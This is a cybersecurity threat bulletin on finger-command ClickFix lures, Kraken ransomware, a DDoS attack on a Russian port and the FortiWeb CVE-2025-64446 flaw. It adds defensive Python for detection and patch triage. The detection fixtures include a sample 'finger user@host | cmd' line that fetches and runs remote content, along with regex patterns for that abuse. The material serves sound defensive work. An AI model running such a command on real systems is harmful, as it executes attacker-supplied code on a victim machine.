
Ankura CTIX FLASH Update - November 19, 2025

Malware Activity

 

The Return of the Finger Command and Kraken Ransomware

Attackers are repurposing the legacy "finger" command, a client for the finger protocol (TCP port 79) once used to look up user information on Unix, Linux, and Windows hosts, as a way to pull attacker-controlled content onto a victim machine. In ClickFix-style social engineering lures, users are shown a fake error or verification prompt, sometimes disguised as a PDF or a legitimate system dialog, and are talked into pasting a command that uses finger to retrieve attacker-supplied content from a remote server and execute it, which in turn installs remote access tools or further malicious scripts. Because the finger client is a built-in operating system binary and the protocol is rarely inspected, the technique can slip past defenses tuned to HTTP downloads; blocking outbound TCP port 79 at the perimeter and alerting on any use of the finger client are the recommended mitigations. Separately, Kraken ransomware has emerged as a serious cross-platform threat targeting Windows and Linux systems. It benchmarks each victim machine to choose an encryption mode that maximizes speed and damage while limiting the chance of detection, gains initial access by exploiting vulnerabilities, exfiltrates data, and then encrypts critical files, with ransom demands reported to reach $1 million. Kraken also wipes logs to hinder forensics and coordinates through underground forums, making it a sophisticated and adaptable extortion tool operating across many countries. CTIX analysts will continue to report on the latest malware strains and attack methodologies.
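
The two controls recommended above (alert on finger client use, block outbound TCP/79) can be expressed as simple detection logic. The following is an added example written for this briefing, not code from the reported campaign or from any vendor; it runs over constructed process-creation and connection records, and the `finger <user>@<host> | cmd` command-line shape it looks for is an assumed pattern rather than a captured sample.

```python
"""Added example: spot ClickFix-style abuse of the finger client.

Illustrative detection logic written for this briefing, not code from the
reported campaign, from ClickFix lures or from any vendor. The events below
are constructed process-creation records (assumed to resemble Sysmon Event
ID 1 / EDR telemetry) and the command-line shapes are assumed patterns, not
captured samples.
"""
import re

FINGER_PORT = 79

# Assumed pattern: finger <user>@<host> with its output piped into an interpreter.
FINGER_PIPED = re.compile(
    r"\bfinger(?:\.exe)?\s+\S+@(\S+)\s*\|\s*(cmd|powershell|pwsh)", re.I)
# Any finger lookup against a named host.
FINGER_ANY = re.compile(r"\bfinger(?:\.exe)?\s+\S*@([\w.\-]+)", re.I)
LOCAL_HOSTS = {"localhost", "127.0.0.1"}
# Parents that should never be spawning a finger client (document/mail readers).
DOC_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}

def classify(event):
    """Return (severity, reason) for a suspicious event, or None if benign."""
    cmd = event["cmdline"]
    m = FINGER_PIPED.search(cmd)
    if m:
        return ("high", f"finger output from {m.group(1)} piped into {m.group(2)}")
    m = FINGER_ANY.search(cmd)
    if m:
        host = m.group(1).lower()
        if host in LOCAL_HOSTS:
            return None
        if event["parent"].lower() in DOC_PARENTS:
            return ("high", f"{event['parent']} spawned finger to remote host {host}")
        return ("medium", f"finger lookup to remote host {host}")
    return None

def detect(events):
    """Run classify() over a batch; returns a list of (cmdline, severity, reason)."""
    hits = []
    for e in events:
        verdict = classify(e)
        if verdict:
            hits.append((e["cmdline"], *verdict))
    return hits

def egress_to_finger(connections):
    """Network-side check: flag outbound TCP/79, which has no business use on
    a modern enterprise network. Input: dicts with proto, dst, dport."""
    return [c for c in connections
            if c["proto"].lower() == "tcp" and c["dport"] == FINGER_PORT]

# Constructed sample telemetry (not real logs). Addresses are documentation ranges.
EVENTS = [
    {"parent": "explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c finger user@203.0.113.10 | cmd"},
    {"parent": "winword.exe", "image": r"C:\Windows\System32\finger.exe",
     "cmdline": "finger report@198.51.100.7"},
    {"parent": "cmd.exe", "image": r"C:\Windows\System32\finger.exe",
     "cmdline": "finger alice@localhost"},
    {"parent": "explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\invoice.pdf"},
]
CONNECTIONS = [
    {"proto": "tcp", "dst": "203.0.113.10", "dport": 79},
    {"proto": "tcp", "dst": "198.51.100.7", "dport": 443},
]

if __name__ == "__main__":
    for cmdline, severity, reason in detect(EVENTS):
        print(f"[{severity}] {reason}: {cmdline}")
    for c in egress_to_finger(CONNECTIONS):
        print(f"[high] outbound finger to {c['dst']}:{c['dport']}")
```

The host-side rule scores a finger-to-interpreter pipe highest, treats finger spawned from an Office or PDF reader as high regardless of what follows, and leaves lookups against localhost alone; the network-side rule is deliberately blunt because legitimate outbound finger traffic is effectively nonexistent.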

 

Threat Actor Activity

 

Russian Port Operator Hit with Three Day DDoS Attack and Intrusion Attempts

Russian port operator Port Alliance experienced three (3) days of disruption from a cyberattack launched from abroad against its digital infrastructure, the latest in a series of attacks on critical facilities amid the ongoing conflict between Russia and Ukraine. The attackers combined a distributed denial-of-service (DDoS) assault with attempted network intrusions, aiming to destabilize operations and disrupt the business processes behind exports of coal and mineral fertilizers through seaports in the Baltic, Azov–Black Sea, Far Eastern, and Arctic regions. The DDoS traffic came from a botnet of over 15,000 unique IP addresses worldwide, including addresses inside Russia, and the attackers adapted their tactics as defenses responded. Despite the intensity of the attack, Port Alliance reported that its terminals and facilities continued to operate normally, with all key systems remaining functional. The company operates six (6) maritime terminals with an annual cargo turnover exceeding 50 million tons. No specific threat group has been attributed to the attack at this time. Cyberattacks on transport and logistics networks have increased since Russia's invasion of Ukraine in 2022, and similar attacks have been reported in Ukraine and allied nations, including a recent DDoS attack on Danish government websites allegedly carried out by the pro-Russian hacktivist group NoName057(16).

 

Vulnerabilities

 

CISA Orders Emergency Patching of Actively Exploited FortiWeb Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in Fortinet's FortiWeb web application firewall to its Known Exploited Vulnerabilities (KEV) catalog and given Federal Civilian Executive Branch (FCEB) agencies only seven (7) days to patch it, reflecting active exploitation worldwide. The flaw, tracked as CVE-2025-64446 (CVSS 9.1/10), chains a path traversal with an authentication bypass, allowing unauthenticated remote attackers to execute administrative commands and create new administrator accounts for persistent access. It affects FortiWeb versions 7.0.0 through 8.0.1 and was quietly fixed in 7.0.12, 7.2.12, 7.4.10, 7.6.5, and 8.0.2, without Fortinet mentioning the fix in the release notes. Researchers from Defused, watchTowr, Rapid7, and PwnDefend reported global, indiscriminate exploitation since early October, with exploit code and a purported zero-day offered for sale on dark web forums, and Rapid7 and Tenable observed hundreds of exposed, vulnerable U.S. systems on Shodan. Organizations that cannot patch immediately are advised to disable HTTP/HTTPS access on internet-facing management interfaces until updates are applied. Fortinet has confirmed exploitation but declined to say when it learned of the issue; it urges customers to upgrade immediately and to review configurations and logs for administrator accounts they did not create, since patching alone does not remove access an attacker has already established. This is the 21st Fortinet flaw on CISA's KEV list.
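
Two checks fall directly out of the advisory: is a given FortiWeb build below the first fixed release for its branch, and have any administrator accounts appeared that the defender did not create? The following is an added example written for this briefing, not Fortinet tooling; the fixed versions are those listed above, while the device inventory, the approved-admin baseline and the key=value log lines are constructed sample data in an assumed format, not FortiWeb's real syslog schema.

```python
"""Added example: triage FortiWeb devices for CVE-2025-64446.

Illustrative code written for this briefing, not Fortinet's tooling. The
fixed versions are those named in the advisory above. The device inventory,
the admin baseline and the event log lines are constructed sample data, and
the key=value log format is an assumed simplification, not FortiWeb's
actual syslog schema.
"""
import re

# First fixed release per affected branch (per the advisory above).
FIXED = {
    (7, 0): (7, 0, 12),
    (7, 2): (7, 2, 12),
    (7, 4): (7, 4, 10),
    (7, 6): (7, 6, 5),
    (8, 0): (8, 0, 2),
}

def parse_version(text):
    """'7.6.4' or 'v7.6.4' -> (7, 6, 4); raise on anything else."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised FortiWeb version: {text!r}")
    return tuple(int(x) for x in m.groups())

def is_vulnerable(text):
    """True if the build predates its branch's fix, False if it is fixed,
    None if the branch is not one the advisory lists (check manually)."""
    v = parse_version(text)
    fixed = FIXED.get(v[:2])
    if fixed is None:
        return None
    return v < fixed

# Constructed inventory: hostname -> running version.
INVENTORY = {
    "waf-dmz-01": "7.6.4",
    "waf-dmz-02": "7.6.5",
    "waf-lab-01": "8.0.1",
    "waf-old-01": "6.4.3",
}

def triage(inventory):
    """Map hostname -> 'patch', 'ok' or 'verify'."""
    verdict = {True: "patch", False: "ok", None: "verify"}
    return {host: verdict[is_vulnerable(ver)] for host, ver in inventory.items()}

# Post-exploitation review: the bug is used to create admin accounts, so diff
# the configured admins against an approved baseline and pull creation events.
APPROVED_ADMINS = {"admin", "secops-ro"}          # constructed baseline

# Constructed log lines in an assumed key=value format (not real FortiWeb output).
LOGS = [
    'date=2025-11-10 time=03:12:44 subtype=admin action="add" user="admin" name="svc_backup" src=203.0.113.45',
    'date=2025-11-11 time=09:01:02 subtype=admin action="login" user="secops-ro" src=10.0.0.5',
    'date=2025-11-12 time=14:20:09 subtype=admin action="add" user="admin" name="helpdesk2" src=198.51.100.9',
]

def unknown_admins(configured, approved):
    """Admin accounts present on the device but absent from the baseline."""
    return sorted(set(configured) - set(approved))

def admin_creation_events(lines):
    """(date, time, new_account, source_ip) for every admin 'add' event."""
    pairs = re.compile(r'(\w+)=("[^"]*"|\S+)')
    events = []
    for line in lines:
        kv = {k: v.strip('"') for k, v in pairs.findall(line)}
        if kv.get("subtype") == "admin" and kv.get("action") == "add":
            events.append((kv["date"], kv["time"], kv["name"], kv["src"]))
    return events

if __name__ == "__main__":
    for host, verdict in triage(INVENTORY).items():
        print(f"{host}: {verdict}")
    print("unknown admins:", unknown_admins(["admin", "secops-ro", "svc_backup"], APPROVED_ADMINS))
    for ev in admin_creation_events(LOGS):
        print("admin created:", ev)
```

The version check compares per branch rather than against a single number, because 7.4.10 is fixed while 7.6.4 is not, and it returns a separate "verify" result for branches the advisory does not list rather than silently declaring them safe. The account review is the part a patch cannot do for you: any admin outside the baseline, or any creation event from an unexpected source address, should be treated as a compromise indicator.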

 


© Copyright 2025. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
